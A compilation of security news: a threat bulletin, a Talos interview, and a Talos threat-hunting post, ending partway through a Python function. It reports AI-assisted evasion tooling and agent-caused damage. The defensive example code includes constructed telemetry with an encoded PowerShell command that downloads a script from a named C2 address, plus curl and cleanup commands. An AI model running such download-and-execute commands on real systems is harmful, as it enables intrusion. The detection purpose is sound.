Thursday, June 4, 2026

ThreatsDay Bulletin: AI Agents Gone Wrong, Sketchy C2 Tools, ClickFix Tricks, JS Backdoors & 20+ New Stories

It got stupid again.

The internet still feels held together with tape. Bad plugins, old bugs, fake tools, trusted apps doing shady things. Same mess, new wrapper. And now the weird stuff is normal. Forums go down and come back worse. Cheap hackers get better toys. AI starts breaking real systems. Great.

Read the whole thing before it ruins your week anyway.

  1. Unauthenticated SSRF risk

    Cisco has released fixes to address a high-severity security flaw in Unified Communications Manager (CVE-2026-20230, CVSS score: 8.6) that could allow an unauthenticated, remote attacker to conduct server-side request forgery (SSRF) attacks through an affected device. "This vulnerability is due to improper input validation for specific HTTP requests," Cisco said. "An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root." The issue has been addressed in Cisco Unified CM and Unified CM SME Release versions 14SU6 and 15SU5. Cisco said it's aware of the availability of proof-of-concept exploit code for the flaw, but noted there is no evidence of active exploitation. It credited an independent security researcher working with SSD Secure Disclosure for reporting the vulnerability.

  2. Mobile spyware operation

    Russia's Federal Security Service (FSB) has disclosed details of what it described as a "large-scale action" undertaken by foreign intelligence services to stealthily implant spyware on the mobile devices of high-ranking officials in the country. "This software was utilized to exfiltrate existing data, intercept ongoing conversations, and conduct covert audio and video surveillance of the immediate surroundings of the electronic devices, with the ultimate objective of obtaining sensitive information," the FSB said. Russia did not reveal who was behind the attacks, but noted the "representatives of foreign intelligence services" leveraged the technical capabilities of major international IT corporations to exfiltrate sensitive data from the devices. This specifically included the exploitation of mobile communication channels, the agency added. An investigation into the activity is ongoing, with the FSB also initiating a criminal case to investigate the matter.

  3. Layered keylogger lures

    Threat actors have been relying on social engineering over the past few months to push VIP Keylogger via loaders written in JavaScript, batch scripts, and Visual Basic Script (VBS). "Attackers are masquerading as legitimate business communications such as bank payment notifications, procurement orders, and logistics updates to lure users into opening malicious files," Splunk said.

  4. Crypto sanctions escalation

    The U.S. Treasury's Office of Foreign Assets Control (OFAC) has announced sanctions against Nobitex, Iran's largest cryptocurrency exchange, for facilitating payments related to terrorist activities. "Nobitex has provided significant support to the regime, processing more than 50 percent of all Iranian digital asset inflows in 2025 and facilitating payments tied to Iran's terrorist activities, sanctions evasion efforts, and Islamic Revolutionary Guard Corps (IRGC)-linked transactions, including activity associated with IRGC-affiliated ransomware actors," the Treasury said. The sanctions also extend to Nobitex's chairman, co-founder, and former CEO, Amir Hossein Rad, as well as other Nobitex leaders and officials, and three other exchanges: Wallex, Bitpin, and Ramzinex. According to Chainalysis, Nobitex processed over 50% of all Iranian digital asset inflows last year. The four exchanges accounted for roughly $7.7 billion, 78% of Iran's USD 9.9 billion in attributed 2025 crypto volume, per TRM Labs.

  5. Cybercrime forum fallout

    The July 2025 law enforcement takedown of XSS, a prominent Russian-speaking cybercrime forum, didn't dismantle the ecosystem. Rather, it fractured it into competing, harder-to-track factions, Flashpoint said. The collapse has triggered an exodus into new, unvetted, and often adversarial communities. Some of the new forums that have rushed to fill up the void left by XSS include DamageLib (launched by legacy moderators of XSS), Rehub (launched by another former XSS moderator), XSS.pro (a resurrection using old backups and suspected to be a law-enforcement honeypot), and XSSF (started by a pro-Russian Telegram hacking group).

  6. RMM abuse surge

    A lesser-known remote desktop tool called Tiflux is being used in a growing number of attacks to establish persistence, transmit screenshots, and run commands to collect system profiling information. "Threat actors behind the rogue Tiflux incidents also installed UltraVNC, an open-source remote access tool, sideloaded other commercial RMMs, including Splashtop and ScreenConnect, and installed an outdated driver that can permit the threat actor to elevate their own privileges on an infected system," Huntress said. "Threat actors continue to test and weaponize the use of commercial remote access management tools."

  7. Malware delivery network

    A threat cluster tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates (aka SocGholish) social engineering techniques on compromised sites. Thousands of websites are estimated to have been compromised, directing users to malicious infrastructure. DriveSurge primarily acts as an initial access broker (IAB) operating on a pay-per-install (PPI) model, enabling follow-on attacks. Visitors of compromised websites are steered through a traffic distribution system (TDS) known as zTDS, which profiles the system and decides whether the visitor should be served a ClickFix or a FakeUpdates lure. zTDS, in use since at least 2015, is publicly available at ztds[.]info. "Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," Silent Push said. The campaign has been active since September 2025.

  8. Sensitive data leak

    The Spanish National Police has arrested an unidentified individual for leaking sensitive information related to members of various critical state organizations, including the National Cybersecurity Institute (INCIBE), the State Attorney General's Office, the National Police, the Civil Guard, and the National Security Council.

  9. JavaScript backdoor malspam

    Intrinsec has disclosed that multiple malspam campaigns have been used to distribute a JavaScript-coded backdoor. "The targets of those campaigns were from all regions and sectors, notably energy and finance ministries, including in the CIS region," the company said. "We believe the campaigns to be financially motivated and operated for email account compromise (EAC) and/or business email compromise (BEC)." The activity was observed in March 2026.

  10. On-chain malware delivery

    Cybersecurity researchers have flagged an intrusion in which threat actors used the EtherHiding technique to route ClearFake payload delivery through smart contracts on the BNB Smart Chain testnet. "The attack chain ended with two simultaneously deployed stealers, SectopRAT and ACRStealer, alongside an on-chain execution tracker that confirmed each victim compromise in real time," Trend Micro said.

  11. Cloud attack tradecraft

    Nation-state hacking groups like APT29, APT33, and UTA0355 are exploiting ROADtools, a Python-based open-source framework for red-teaming and research, to blend in with normal traffic and evade detection. "ROADtools operates through legitimate Microsoft APIs and can mimic typical traffic," Palo Alto Networks Unit 42 said. "Further defense evasion can be achieved by configuring request attributes such as user-agent strings. These capabilities have made ROADtools a valuable asset for attackers. Nation-state threat actors have used it in recent cloud intrusions for discovery, persistence, and defense evasion. Attackers involved in a targeted phishing campaign in early 2025 used tooling that matches ROADtools' token management capabilities."

  12. Data-only extortion rises

    Pure data-exfiltration campaigns that pressure victims without deploying ransomware are on the rise. In 2025, such attacks have primarily targeted professional services, healthcare, and consumer services firms. "Interestingly, while manufacturing remains the single most disrupted sector overall, construction has witnessed a 44% year-over-year increase as a data-only extortion hotspot," Unit 42 said. "These firms are attractive targets due to lucrative financial blueprints and bidding data combined with data egress controls."

  13. AI-assisted evasion testing

    An unknown threat actor has been observed using artificial intelligence (AI) technologies to automate Active Directory discovery and refine endpoint detection and response (EDR) evasion tactics in a red team post-exploitation framework. "Analysis revealed that AI for malware development was more limited and was mainly used to coordinate workflows and support experimentation," Sophos said. "The actual EDR-bypass path was a structured engineering test cycle that included human review and iteration." To develop tools for bypassing EDR agents, the attacker is said to have used Cursor and Anthropic Claude Opus. At the core of the framework is a Python tool that generates Go and Rust payloads for testing with an aim to resist sandboxing, antivirus, and EDR detection. This approach was used to build nearly 80 modules covering more than 70 techniques. Also attributed to the threat actor are Python-based malware development scripts for injecting shellcode into legitimate Windows executables and a Telegram bot API-based external command and control (C2) mechanism. "The use of AI agents to accelerate tool development and test evasion techniques lowers the barrier to entry for sophisticated red team-style attacks," Sophos said. "However, this shift does not change how defenders should protect themselves." The framework is said to be built for stealthy post-exploitation activity in target environments, linking it to "known ransomware deployment and data theft operations."

  14. Steam-hosted malware payloads

    A newly identified malware is using Steam Community profile comments to host malicious payloads for WordPress, hiding malicious infrastructure behind Valve's legitimate platform. "The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods," GoDaddy said. "A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests." The malware performs two primary functions: client-side JavaScript injection, which fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages; and a server-side backdoor that provides cookie-authenticated remote access for modifying PHP files across plugins and themes. The campaign was first detected in July 2025. The malware has been detected on approximately 1,980 WordPress sites. It is unclear how the websites are breached, but it's assessed that the initial infection vector could be stolen admin logins, compromised FTP/SFTP credentials, the exploitation of a vulnerable WordPress theme or plugin, or a supply chain compromise.
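The "invisible Unicode characters" mechanism is worth seeing from the defender's side, because text-based scanners that only look for PHP or URL strings will miss it. The following Python example is added here and is not code from GoDaddy or from the analyzed malware; it scans text (a fetched profile comment, a cached page, a plugin file) for runs of zero-width and Unicode "format" (Cf) code points. The set of code points and the run-length threshold are assumptions for the example, and the sample comments are constructed. The one edge case a practitioner needs to handle is that a lone ZERO WIDTH JOINER is normal inside emoji sequences, so a single invisible character is not a signal; a long consecutive run is.

```python
import unicodedata

# A starter set of zero-width code points that text steganography schemes commonly
# use (an assumption for this example, not a list taken from the GoDaddy analysis).
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
    "\u180e": "MONGOLIAN VOWEL SEPARATOR",
}


def is_invisible(ch: str) -> bool:
    # Unicode category Cf ("format") catches invisible controls beyond the explicit set.
    return ch in ZERO_WIDTH or unicodedata.category(ch) == "Cf"


def invisible_runs(text: str):
    """Return (offset, length) for each maximal run of consecutive invisible characters."""
    runs, start = [], None
    for i, ch in enumerate(text):
        if is_invisible(ch):
            if start is None:
                start = i
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, len(text) - start))
    return runs


def scan_text(text: str, min_run: int = 8) -> dict:
    """Summarise invisible characters; a long run is the signal, a lone ZWJ is not."""
    runs = invisible_runs(text)
    longest = max((n for _, n in runs), default=0)
    return {
        "invisible_count": sum(n for _, n in runs),
        "longest_run": longest,
        "suspicious": longest >= min_run,
    }


# Constructed sample "profile comments": one clean, one with a legitimate emoji
# ZWJ sequence (man technologist), one carrying 40 hidden code points in a run.
SAMPLES = {
    "benign": "nice profile, gg wp",
    "emoji_zwj": "\U0001F468\u200d\U0001F4BB good game",
    "stego": "great trades " + "".join("\u200b\u200c"[i % 2] for i in range(40)) + " cheers",
}

if __name__ == "__main__":
    for name, comment in SAMPLES.items():
        print(name, scan_text(comment))
```

Running the block prints one summary per sample; only the constructed "stego" comment comes back suspicious, while the emoji sequence is counted but not flagged. In a WordPress context the same scan can be run over content the site fetches from third-party platforms before it is ever evaluated, or over plugin and theme files during an integrity check.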

  15. Trusted tools abused

    Flare.io has disclosed details of FalkonC2, a commercial hacking tool that appears designed to hide inside enterprise environments by abusing trusted remote access software. "FalkonC2 has an enterprise version called Rotemelli2 that runs in memory, rotates its command-and-control domains every 72 hours, and uses tools such as ScreenConnect, Datto, and SimpleHelp to quietly launch attacks," the company said in a statement. An analysis of dashboard telemetry suggests active enterprise infections across the U.S., Australia, the Netherlands, and Poland. The framework also checks infected machines for QuickBooks and Sage50 data, suggesting attackers are looking for accounting systems they can quickly exfiltrate.

  16. AI vulnerability surge

    Anthropic is broadening access to its Project Glasswing program, adding approximately 150 organizations in 15 countries for access to its Claude Mythos Preview. "The bottleneck in cybersecurity is now verifying, disclosing, and patching the large numbers of vulnerabilities that Mythos-class models can surface," the company said. The growing number of flaws identified with the help of AI models has shifted the scales from discovery to patching. A recent report from the Cloud Security Alliance (CSA), the SANS Institute, and the Open Worldwide Application Security Project (OWASP) concluded that in the near term, organizations are "likely to be overwhelmed" by threat actors using AI to find and exploit vulnerabilities faster than defenders can patch them. "The cost and capability floor to exploit discovery is dropping, the time between disclosure and weaponization is compressing toward zero, and capabilities that previously required nation-state resources are now becoming broadly accessible," the report said.

  17. Linux flaw under attack

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a Linux Kernel flaw (CVE-2022-0492, CVSS score: 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by June 5, 2026. "Linux Kernel contains an improper authentication vulnerability which could allow for privilege escalation via the cgroups v1 release_agent feature," CISA said. The development comes after Kaspersky said it observed the flaw, along with CVE-2019-5736 and CVE-2024-21626, being exploited in attacks aimed at container environments.

  18. Fake image tools deliver malware

    A new ClickFix-style lure is being dressed up as free image-editing tools to deliver CastleLoader, which then drops both NetSupport RAT and a custom .NET stealer called CastleStealer. "The sites look like every other 'remove your photo background' service with uploads, progress bars, and download buttons, but the entire UI is fake," Huntress said. The activity has been codenamed BackgroundFix. CastleLoader is attributed to a threat cluster known as GrayBravo.

  19. Session theft defense

    Google has revealed that Device Bound Session Credentials (DBSC) in the Chrome browser is now generally available and enabled by default for Google Workspace users. "DBSC strengthens account security after users are logged in and helps bind a session cookie - small files used by websites to remember user information - to the device a user authenticated from," Google said. "Even if malware was present on the user's device, DBSC reduces the risk of session theft and makes it meaningfully more difficult for malicious actors to exploit stolen session cookies." The feature was formally released in April 2026.

  20. Adobe abused in phishing

    Cybercriminals are weaponizing Adobe infrastructure in a LinkedIn phishing campaign that steals passwords and redirects victims to the legitimate LinkedIn site afterward. Opening an HTML attachment in the email message serves a login form urging the recipient to enter their credentials. The captured information is delivered to the domain "lnkd.tt.omtrdc[.]net/rest/v1/delivery," after which they are redirected to the LinkedIn site. "This domain belongs to Adobe and is associated with the Adobe Target A/B testing platform," Malwarebytes said. "But the campaign isn't using Adobe Target to receive the phished credentials. Instead, attackers are abusing Adobe Target as a redirect/abuse point in the phishing flow."

  21. Supply chain delay defense

    RubyGems has included a cooldown, a time-based filter, in Bundler version 4.0.13 that refuses to resolve to a version until it has been public for at least "N" days. "Releases too new to have been scrutinized are passed over in favor of ones that have aged past the window," Hiroshi Shibata, RubyGems maintainer, said. "It is opt-in, and complements rather than replaces existing defenses like mandatory 2FA and trusted publishing." Users can declare a "small cooldown" on the source in the Gemfile. The efforts go along with other initiatives like AI-assisted vulnerability scanning against the most critical gems in the registry.

  22. Iran-linked Israel attacks

    ESET said it recorded an unusual spike in Iran-aligned activity against Israeli targets between October 2025 and March 2026 that could not be linked to previously known groups. "Two unattributed activity clusters, Rusty Boots and MoKhargosh, demonstrated both espionage capabilities and destructive potential - including deployment of a bootkit-style wiper and retaining destructive tooling for later use - whereas a third, MOØN Badr, appears to have been limited to targeted espionage," the Slovakian company said. MoKhargosh, first observed in January 2026, used Go-compiled binaries in attacks targeting Israel. This includes a backdoor called GoKhargosh, along with wipers, filecoders that overwrite files with junk data, and a wiper that targets the master boot record to render the system unbootable. MOØN Badr, on the other hand, singled out three unidentified victims in Israel in early January 2026 to deliver the MOØN AGENT backdoor via phishing emails to facilitate command execution and file uploads and downloads.

  23. Fuel tank systems exposed

    The U.S. government has issued an advisory urging organizations to take steps to defend against attacks targeting U.S.-based automatic tank gauge (ATG) systems by securing them with strong passwords and by removing them from the internet to reduce public exposure. The activity, which remains unattributed, involves the attackers compromising internet-exposed ATG systems via hard-coded credentials, command execution, and SQL injection vectors, followed by escalating privileges to obtain full administrator rights and modifying the system functions. "Should a cyber threat actor exploit these vulnerabilities and compromise an ATG system, they could disrupt or manipulate the below critical functions by interfacing directly with the tank management as though they possessed legitimate physical access to the system console," government agencies said.

  24. Verified call defense

    Google has announced a fake call detection feature, built on Rich Communication Services (RCS), for Android devices running Android 12 and later that verifies whether a call is actually coming from the caller's own Android smartphone. Enabled by default, the alert is designed to help users avoid falling victim to deepfake impersonation and call spoofing in real time. "When a contact calls you and you're both using Phone by Google, their device sends a silent confirmation signal in real time to your device to verify the call is legitimate and truly coming from the contact's device," Google said. "If a scammer tries to impersonate your contact, that initial confirmation signal will be missing. Your device will instantly notice this and ping your contact's actual device to double-check. If their real device says, 'I'm not making a call right now,' you'll get a warning on your screen advising you to hang up immediately." Because the digital handshake uses end-to-end encrypted RCS technology, Google said the process is completely private. That said, the feature requires users to have three Google apps installed: Phone by Google, Contacts, and Google Messages. It will roll out globally this month, starting with Pixel devices.

  25. Agentic AI failures

    An analysis of 7,200 publicly reported AI-security and operational incidents has identified "344 verified enterprise-relevant agent-inflicted damage cases between September 2023 and May 2026, including 188 incidents where autonomous AI systems caused direct organizational harm without any external attacker involvement," Cyera researchers Ehud Halamish, Assaf Morag, and Vladimir Tokarev said. "The majority of confirmed incidents involved real production impact rather than theoretical AI risk scenarios. Observed outcomes included deleted databases, destructive cloud actions, unauthorized financial operations, runaway API spending, service outages, exposed secrets, and silent integrity corruption inside enterprise environments. As agents gain broader permissions and deeper integration into SaaS, cloud, development, and business environments, the AI interaction layer itself increasingly becomes part of the enterprise attack surface and critical data perimeter."

The lesson is boring because the lesson is always boring. Patch faster, kill exposed admin panels, stop trusting "safe" tools by name, and watch the weird edges where attackers like to hide. The cheap stuff still works because too many teams leave it cheap.

Security is not magic. It is inventory, logs, least privilege, backups, tested restores, and people who notice when something normal starts acting wrong. Do that well, and half this mess gets a lot less exciting. That is the point.



from The Hacker News https://ift.tt/VCOF57a
via IFTTT

Winning the cyber marathon with Tony Giandomenico


In the high-speed world of cybersecurity, the difference between a breach and a breakthrough often comes down to endurance. Tony Giandomenico, Senior Director of Product Management with Cisco Talos, joins me to discuss how he balances the intensity of leading major product launches with the grueling discipline of Ironman triathlons.

Beyond the technical specs and new threat hunting features, this conversation dives deep into the human side of leadership. Tony shares his hard-won lessons on the power of communication, the importance of knowing your "why," and how to navigate the complexities of a 30-year career without losing your focus.

Amy Ciminnisi: You have been in the thick of the cyber security world for a while now, and a lot of things have shifted in this field. So what has been the biggest surprise for you, and what keeps you excited about leading the charge on the product side?

Tony Giandomenico: Well, I would probably say that the biggest shift over the last six months has been the increased rate of the capabilities of these frontier models. I'm the first one not to jump on the bandwagon of this stuff, because I've been doing this for about 30 plus years or so, but I think this feels a little different. The capabilities are increasing, and I think what that means to cybersecurity is a big shift. How do we deal with all that? From the adversary side, they're actually breaking in the networks like they typically do. They're moving laterally within the environment. They're evading different types of security controls. Finding vulnerabilities, exploiting those vulnerabilities, all of that stuff.

It's also going to be supercharged on the defensive side. Of course, you don't bring a knife to a gun fight, right? You're going to use the same AI technology — you know, the same frontier models — to speed things up there as well. From the product management side, I think we're going to see the things that we would have previously seen five years down the road a lot sooner. And that's kind of what excites me about everything — that opportunity to explore the art of possibility is a lot more at your fingertips where it wasn't necessarily before.

AC: We specifically lined this episode up with the Cisco Talos Threat Hunting launch, which you played a major role in. For people who aren't familiar, can you explain what it is?

TG: Threat hunting is where we're looking for different types of threats that are circumventing our existing security control alerts, detection mechanisms, and so on. When defenders invest in these different types of technologies that are automatically detecting alerts or threats in your environment, the challenge that they have is the sensitivity meter. If they set it to be too high, the team might get inundated with false positives, and then that particular product isn't really worth that investment because you constantly have to investigate those. So the sensitivity meter has to find some place in the middle. That's where it gives these stealthy threat actors a place to live. So you have a combination of AI and human-in-the-loop services, where we build hypotheses to identify actors that may have actually already circumvented your security controls.

Currently, we're hunting in the endpoint telemetry side (e.g., Secure Endpoint) that we offer our customers today. With this expansion, we're expanding it out to our flagship firewall product. So we'll be hunting within Secure Firewall as well as identity, which actually includes Duo and CII, which is Cisco Identity Intelligence.

AC: How do you keep your cool and stay focused on the why behind the work when you're dealing with the intensity of a major launch?

TG: Before coming to Cisco, I had a small cybersecurity consulting company for about 10 years or so out in the Hawaiian Islands. I had the domain expertise, but I had to learn financial aspects, sales, and marketing. I also had to understand what makes people tick. I wasn't able to talk to every individual the same way to get them on board with things. So the biggest thing that I took away when I went from running my business to working in a larger organization was that when folks are in different departments, there are competing priorities and I have to influence them. I have to get them to understand and believe in the vision. So if you go in there with that mindset, knowing that it's not going to flow exactly how you envisioned, things just work out.


Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.



from Cisco Talos Blog https://ift.tt/nK4txCd
via IFTTT

Hypotheses, telemetry, and human judgment: Inside Cisco Talos Threat Hunting


By Ron Scott-Adams

Most security tools operate on a simple principle: If a known-bad pattern appears, fire an alert. This works well enough for many threats, but it fails against adversaries who closely study detection thresholds and deliberately stay under them. 

Cisco Talos Threat Hunting operates on a different principle. Instead of waiting until we’re sure we can cross an alerting threshold, we start with a hypothesis about what specific adversary behavior would look like in the telemetry, and then search for it. Using both AI and human-driven processes, including pioneering hunts built from Talos’ latest threat research, we continuously search for threats that traditional detection misses.

These hunts operate at the leading edge of our intelligence, where patterns are compelling but require expert judgment to distinguish from benign activity. Talos threat analysts provide this judgment to ensure maximum fidelity for your threat landscape.

This post covers how that works in practice.

Hypothesis-driven hunting vs. alert-driven detection 

A detection rule says, "If X happens, alert." A hunt hypothesis says, "Given this specific threat actor uses these specific techniques, what would those techniques look like in this specific telemetry source?" 

The distinction matters because it inverts the workflow. Detection requires prior knowledge encoded into a rule. Hunting requires only a plausible theory about adversary behavior and the telemetry to test it against. 

Our hypotheses come from multiple sources: active threat intelligence on adversary tradecraft, findings from Cisco Talos Incident Response engagements, and patterns observed across global telemetry from nearly 50 million sensors. When Talos sees a new technique in the wild, we can build a hunt for it before a detection signature exists.

Here are a few examples of these threat hunts:

  • Python User-Agent connections to malicious ASN infrastructure. Legitimate Python HTTP requests exist in most environments, but Python calling out to hosting providers with poor reputation scores is a different signal entirely. 
  • MSIEXEC User-Agent making connections to suspicious or malicious ASNs. MSIEXEC fetching remote packages is a known living-off-the-land (LOTL) technique. The user-agent string persists in firewall connection logs even when the payload itself is encrypted. 
  • Domain generation algorithm (DGA) detection via AI/ML. Algorithmically generated domains have statistical properties (character distribution, entropy, n-gram frequency) that distinguish them from human-registered domains. Our models flag DNS queries that match these patterns. 
  • Connections to EVILEMPIRE ASN ranges. Certain autonomous systems have a long, documented history of hosting command-and-control (C2) infrastructure. Outbound connections to these ranges warrant investigation regardless of the specific destination IP. 
  • User-Agent and application outliers. Baseline what's normal for an environment, then surface what deviates. A curl binary running on a finance team's workstation at 2am is not the same signal as curl running in a CI/CD pipeline. 
  • Endpoint detection and response (EDR) research findings correlated with network indicators of compromise (IOCs). When endpoint telemetry reveals a new threat, the associated network indicators become hunt targets across firewall data for all customers.
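To make the hunt list above concrete, here is an added Python example (not Talos code, and not the logic of the Threat Hunting engine) that runs three of those hypotheses over a handful of constructed firewall connection events: Python and msiexec user-agents reaching ASNs on a reputation list, and an entropy and character-mix score for DGA-like hostnames. The ASNs, hosts and addresses are placeholders from the documentation ranges, the msiexec user-agent string ("Windows Installer") is assumed, and the DGA thresholds are illustrative rather than tuned against real traffic.

```python
import math
from collections import Counter

# Constructed firewall connection events (RFC 5737 documentation addresses,
# private-use ASNs; not real customer telemetry).
FIREWALL_EVENTS = [
    {"src": "10.0.5.12", "dst": "203.0.113.7",   "asn": "AS64496",
     "user_agent": "python-requests/2.31.0", "host": "cdn.example.com"},
    {"src": "10.0.5.12", "dst": "198.51.100.9",  "asn": "AS64500",
     "user_agent": "python-requests/2.31.0", "host": "pkg.example.org"},
    {"src": "10.0.7.3",  "dst": "198.51.100.22", "asn": "AS64500",
     "user_agent": "Windows Installer", "host": "xk3q9v2mtz8bq.example.net"},
    {"src": "10.0.9.8",  "dst": "192.0.2.44",    "asn": "AS64501",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0)", "host": "mail.example.com"},
]

# Constructed reputation list standing in for the poor-reputation and
# EVILEMPIRE-style ASN ranges the post describes.
BAD_ASNS = {"AS64500", "AS64501"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0 for a single repeated character)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scored_label(domain: str) -> str:
    """Pick the longest label below the TLD; DGAs usually generate that part."""
    labels = domain.lower().rstrip(".").split(".")[:-1]
    return max(labels, key=len) if labels else domain.lower()


def is_dga_like(domain: str, entropy_threshold: float = 3.0, min_len: int = 10) -> bool:
    """High entropy plus an unusual digit/vowel mix on a long label suggests a DGA."""
    label = scored_label(domain)
    if len(label) < min_len:
        return False
    digits = sum(ch.isdigit() for ch in label) / len(label)
    vowels = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= entropy_threshold and (digits > 0.1 or vowels < 0.2)


def run_hunts(events, bad_asns=BAD_ASNS):
    """Apply three hunt hypotheses; returns (hypothesis, source host, indicator) tuples."""
    findings = []
    for ev in events:
        ua = ev["user_agent"].lower()
        if ev["asn"] in bad_asns:
            if ua.startswith("python-"):
                findings.append(("python-ua-to-bad-asn", ev["src"], ev["dst"]))
            elif "windows installer" in ua:
                findings.append(("msiexec-ua-to-bad-asn", ev["src"], ev["dst"]))
        if is_dga_like(ev["host"]):
            findings.append(("dga-like-domain", ev["src"], ev["host"]))
    return findings


if __name__ == "__main__":
    for finding in run_hunts(FIREWALL_EVENTS):
        print(finding)
```

Each finding is a candidate, not a verdict: the Python request to a bad ASN might be a developer's package mirror, which is exactly the kind of context an analyst resolves in the next step. The entropy score is a deliberately simple stand-in for the n-gram and character-distribution models the post mentions; in production the thresholds would be learned from the environment's own DNS baseline rather than fixed.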

Each of these hunts runs continuously. The AI engine executes them at scale, 24 hours a day, across all enrolled customer environments. It surfaces candidates. Then a human analyst investigates.

Case study: KongTuke C2 discovery through multi-domain correlation 

The value of correlating telemetry across security domains is easiest to explain with a real example. During a recent engagement with a customer, Talos analysts identified active KongTuke C2 activity by combining firewall and endpoint data in a way that neither source could have accomplished alone. This is the kind of continual awareness we are seeking to bring to customers everywhere with Talos Threat Hunting.

What the firewall showed 

Cisco Secure Firewall telemetry recorded outbound ConnectionEvents to “144.31.221.82” on port 6060, with a URL path of /capcha9856. This pattern is consistent with a Traffic Direction System (TDS) infection, where a compromised website redirects visitors through a chain of intermediate servers before landing on a malicious payload host. 

The firewall gave us the "what" and "when" — a specific device was reaching out to known-bad infrastructure at a known time. But the firewall alone could not tell us how the connection was initiated or what happened next on the host.

What EDR added 

Pivoting to Cisco Secure Endpoint data for the same DeviceIP, we pulled the full process history around the time of the connection. The endpoint telemetry revealed:

  1. cmd.exe process spawning powershell.exe with an -EncodedCommand parameter containing a Base64-encoded payload 
  2. The decoded payload executing Invoke-WebRequest to fetch a file named script.ps1, dropping it into the user's ApplicationData directory 
  3. A separate curl.exe process making requests to the same C2 infrastructure the firewall had flagged 
  4. Post-execution cleanup via Remove-Item, attempting to delete traces of the downloaded script

Why neither source alone was sufficient 

The firewall saw an outbound connection to a suspicious IP. That's useful, but not conclusive on its own. Hundreds of legitimate services might generate similar connection patterns. The EDR saw obfuscated PowerShell execution. That's suspicious, but without the network context confirming the destination was a known C2 server, it could be a false positive from an overzealous admin script. 

Together, they told a complete story: initial compromise via TDS redirect, payload delivery through encoded PowerShell, C2 communication confirmed by both endpoint process tree and network connection logs, and active evidence of anti-forensics (file cleanup). This is a confirmed intrusion with clear remediation steps, not an ambiguous alert requiring hours of analyst triage. 

Broader sweep 

Once we had the process hashes and file paths from EDR, we searched across the full customer environment for other hosts exhibiting the same behavior. This turned a single finding into a scoped understanding of how far the compromise had spread.
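
The firewall-plus-EDR correlation walked through above, as an added example that is not Talos code: constructed firewall ConnectionEvents and endpoint process events (field names are assumptions) are joined on device IP within a five-minute window, the -EncodedCommand payload is decoded, and a host is flagged only when the network hit and the host behaviour line up; a sweep helper then looks for the same artifact on other hosts.

```python
import base64
import re
from datetime import datetime, timedelta

# PowerShell's -EncodedCommand takes Base64 of a UTF-16LE string.
def ps_encode(command):
    return base64.b64encode(command.encode("utf-16-le")).decode()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = re.search(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# Constructed telemetry (not from the engagement). Field names are assumptions;
# real Secure Firewall and Secure Endpoint exports use their own schemas.
FIREWALL_EVENTS = [
    {"ts": "2026-05-20T14:02:11", "src_ip": "10.1.4.27",
     "dst_ip": "144.31.221.82", "dst_port": 6060, "url": "/capcha9856"},
    {"ts": "2026-05-20T14:05:40", "src_ip": "10.1.4.31",
     "dst_ip": "203.0.113.10", "dst_port": 443, "url": "/"},
]
ENDPOINT_EVENTS = [
    {"ts": "2026-05-20T14:01:58", "device_ip": "10.1.4.27", "parent": "cmd.exe",
     "process": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + ps_encode(
         "Invoke-WebRequest http://144.31.221.82:6060/capcha9856 "
         "-OutFile $env:APPDATA\\script.ps1")},
    {"ts": "2026-05-20T14:02:30", "device_ip": "10.1.4.27", "parent": "powershell.exe",
     "process": "curl.exe", "cmdline": "curl.exe http://144.31.221.82:6060/"},
    {"ts": "2026-05-20T14:02:45", "device_ip": "10.1.4.27", "parent": "powershell.exe",
     "process": "powershell.exe",
     "cmdline": "powershell.exe Remove-Item $env:APPDATA\\script.ps1"},
    # Benign admin script on another host: encoded PowerShell, but no C2 contact.
    {"ts": "2026-05-20T14:05:30", "device_ip": "10.1.4.31", "parent": "explorer.exe",
     "process": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + ps_encode("Get-Date")},
]

KNOWN_C2 = {"144.31.221.82"}  # the C2 address named in the write-up
WINDOW = timedelta(minutes=5)

def correlate(fw_events, ep_events, known_c2=KNOWN_C2, window=WINDOW):
    """Join firewall hits on known C2 with endpoint process activity on the
    same host within `window`. Returns {src_ip: sorted evidence labels}."""
    findings = {}
    for fw in fw_events:
        if fw["dst_ip"] not in known_c2:
            continue
        t_fw = datetime.fromisoformat(fw["ts"])
        evidence = set()
        for ep in ep_events:
            if ep["device_ip"] != fw["src_ip"]:
                continue
            if abs(datetime.fromisoformat(ep["ts"]) - t_fw) > window:
                continue
            decoded = decode_encoded_command(ep["cmdline"])
            if decoded and ("Invoke-WebRequest" in decoded or fw["dst_ip"] in decoded):
                evidence.add("encoded_powershell_download")
            if ep["process"].lower() == "curl.exe" and fw["dst_ip"] in ep["cmdline"]:
                evidence.add("curl_to_c2")
            if "Remove-Item" in ep["cmdline"]:
                evidence.add("cleanup")
        if evidence:
            findings[fw["src_ip"]] = sorted(evidence)
    return findings

def sweep(ep_events, artifact):
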